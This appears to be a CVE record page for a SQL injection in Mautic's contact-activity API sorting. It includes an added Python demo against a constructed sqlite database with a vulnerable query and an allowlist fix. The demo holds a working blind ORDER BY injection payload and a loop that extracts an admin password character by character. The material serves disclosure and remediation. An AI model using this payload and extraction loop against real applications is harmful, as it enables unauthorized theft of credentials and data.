CVE-2026-3105 (GCVE-0-2026-3105)

Vulnerability from cvelistv5 – Published: 2026-02-24 18:39 – Updated: 2026-02-24 18:39
Title
SQL Injection in Contact Activity API Sorting
Summary
This advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. In the query construction for the Contact Activity timeline, the parameter that selects the sort direction was not strictly validated against an allowlist, so any authenticated API user could inject arbitrary SQL into the query via the API.
Mitigation
Update to 4.4.19, 5.2.10, 6.0.8 or 7.0.1, or later, on the corresponding release line.
Workarounds
None.
References
If you have any questions or comments about this advisory, email security@mautic.org.
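To make the pattern in the advisory concrete, the following is an added example in Python over sqlite3; it is not Mautic's code, schema or query builder. It constructs a per-contact event log table and a users table, shows a query that splices the sort-direction parameter into ORDER BY as the advisory describes, drives a blind ordering oracle through that parameter the way an authenticated API user could, and then shows the allowlist fix. The table and column names (lead_event_log, users, date_added), the contact id and the password value are all constructed for the example.

```python
import sqlite3
import string

# Constructed sample schema and data (not Mautic's real tables): a per-contact
# event log plus a users table the activity endpoint was never meant to expose.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE lead_event_log (
            id INTEGER PRIMARY KEY, lead_id INTEGER, event TEXT, date_added INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO lead_event_log VALUES
            (1, 42, 'email.sent',     1000),
            (2, 42, 'form.submitted', 2000),
            (3, 42, 'page.hit',       3000);
        INSERT INTO users VALUES (1, 'admin', 'S3cr3t');
        """
    )
    return conn


def activity_query_vulnerable(conn, lead_id, order_dir):
    """The pattern the advisory describes: lead_id is a bound parameter, but the
    sort direction is spliced into the SQL text with no allowlist check."""
    sql = ("SELECT id, event FROM lead_event_log WHERE lead_id = ? "
           f"ORDER BY date_added {order_dir}")
    return conn.execute(sql, (lead_id,)).fetchall()


# Allowlist: request value -> server-side constant. Only these two literals can
# ever reach the query string.
ALLOWED_DIRECTIONS = {"ASC": "ASC", "DESC": "DESC"}


def activity_query_fixed(conn, lead_id, order_dir):
    """Allowlist fix. ORDER BY direction cannot be a bound parameter, so the
    control is a strict lookup (reject on miss), not escaping or quoting."""
    direction = ALLOWED_DIRECTIONS.get(str(order_dir).strip().upper())
    if direction is None:
        raise ValueError(f"invalid sort direction: {order_dir!r}")
    sql = ("SELECT id, event FROM lead_event_log WHERE lead_id = ? "
           f"ORDER BY date_added {direction}")
    return conn.execute(sql, (lead_id,)).fetchall()


def blind_payload(position, guess):
    """Attacker side: replaces the ASC/DESC keyword with an arithmetic
    expression, so the row order flips with the truth of a subquery. No error
    and no extra column comes back; only the ordering leaks a bit per query."""
    return ("* (CASE WHEN (SELECT substr(password, %d, 1) FROM users "
            "WHERE username = 'admin') = '%s' THEN 1 ELSE -1 END)"
            % (position, guess))


def leak_admin_password(conn, query=activity_query_vulnerable, lead_id=42):
    """Recovers the admin password one character at a time through the ordering
    oracle. The charset is alphanumeric so the payload needs no quoting."""
    charset = string.ascii_letters + string.digits
    recovered = ""
    while True:
        for ch in charset:
            rows = query(conn, lead_id, blind_payload(len(recovered) + 1, ch))
            if rows[0][0] == 1:      # ascending order => condition was true
                recovered += ch
                break
        else:
            return recovered         # no character matched: end of string


def fixed_rejects(conn, value, lead_id=42) -> bool:
    """True if the allowlisted query refuses the given sort value."""
    try:
        activity_query_fixed(conn, lead_id, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", leak_admin_password(db))
    print("fixed rejects payload:", fixed_rejects(db, blind_payload(1, "S")))
```

The fix maps the request value onto a constant held in server code rather than checking the input with a regex or escaping it: the only strings that can appear after ORDER BY are the two dictionary values, and anything else is rejected before a query is built. The same approach applies to sort column names, which are equally unparameterizable and should be resolved through a fixed map of API field name to column.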
CWE
  • CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
Mautic
Impacted products
Vendor: Mautic
Product: Mautic (packagist: mautic/core)
Version: Affected >= 2.10.0 and < 4.4.19 / < 5.2.10 / < 6.0.8 / < 7.0.1 (semver; fixed in 4.4.19, 5.2.10, 6.0.8 and 7.0.1)
Credits
q1uf3ng (reporter), parykgruszka (remediation developer), escopecz (remediation reviewer), Leuchtfeuer Digital Marketing (sponsor)

{
  "containers": {
    "cna": {
      "affected": [
        {
          "collectionURL": "https://packagist.org",
          "defaultStatus": "unaffected",
          "packageName": "mautic/core",
          "product": "Mautic",
          "repo": "https://github.com/mautic/mautic",
          "vendor": "Mautic",
          "versions": [
            {
              "lessThan": "\u003c 4.4.19 \u003c5.2.10 \u003c6.0.8 \u003c7.0.1",
              "status": "affected",
              "version": "\u003e= 2.10.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "q1uf3ng"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "parykgruszka"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "escopecz"
        },
        {
          "lang": "en",
          "type": "sponsor",
          "value": "Leuchtfeuer Digital Marketing"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ch3\u003eSummary\u003c/h3\u003e\u003cp\u003eThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.\u003c/p\u003e\u003ch3\u003eMitigation\u003c/h3\u003e\u003cp\u003ePlease update to \u003cstrong\u003e4.4.19\u003c/strong\u003e, \u003cstrong\u003e5.2.10\u003c/strong\u003e, \u003cstrong\u003e6.0.8\u003c/strong\u003e, \u003cstrong\u003e7.0.1\u003c/strong\u003e\u0026nbsp;or later.\u003c/p\u003e\u003ch3\u003eWorkarounds\u003c/h3\u003e\u003cp\u003eNone.\u003c/p\u003e\u003ch3\u003eReferences\u003c/h3\u003e\u003cp\u003eIf you have any questions or comments about this advisory:\u003c/p\u003e\u003cp\u003eEmail us at \u003ca target=\"_blank\" rel=\"nofollow\"\u003esecurity@mautic.org\u003c/a\u003e\u003c/p\u003e\u003cbr\u003e"
            }
          ],
          "value": "SummaryThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.\n\nMitigationPlease update to 4.4.19, 5.2.10, 6.0.8, 7.0.1\u00a0or later.\n\nWorkaroundsNone.\n\nReferencesIf you have any questions or comments about this advisory:\n\nEmail us at security@mautic.org"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-66",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-66 SQL Injection"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-24T18:39:03.352Z",
        "orgId": "4e531c38-7a33-45d3-98dd-d909c0d8852e",
        "shortName": "Mautic"
      },
      "references": [
        {
          "url": "https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93"
        }
      ],
      "source": {
        "advisory": "GHSA-r5j5-q42h-fc93",
        "discovery": "EXTERNAL"
      },
      "timeline": [
        {
          "lang": "en",
          "time": "2026-02-15T13:38:00.000Z",
          "value": "Report received"
        },
        {
          "lang": "en",
          "time": "2026-02-18T09:27:00.000Z",
          "value": "Report accepted"
        },
        {
          "lang": "en",
          "time": "2026-02-24T14:55:00.000Z",
          "value": "Advisory published"
        }
      ],
      "title": "SQL Injection in Contact Activity API Sorting",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "4e531c38-7a33-45d3-98dd-d909c0d8852e",
    "assignerShortName": "Mautic",
    "cveId": "CVE-2026-3105",
    "datePublished": "2026-02-24T18:39:03.352Z",
    "dateReserved": "2026-02-24T10:36:40.356Z",
    "dateUpdated": "2026-02-24T18:39:03.352Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

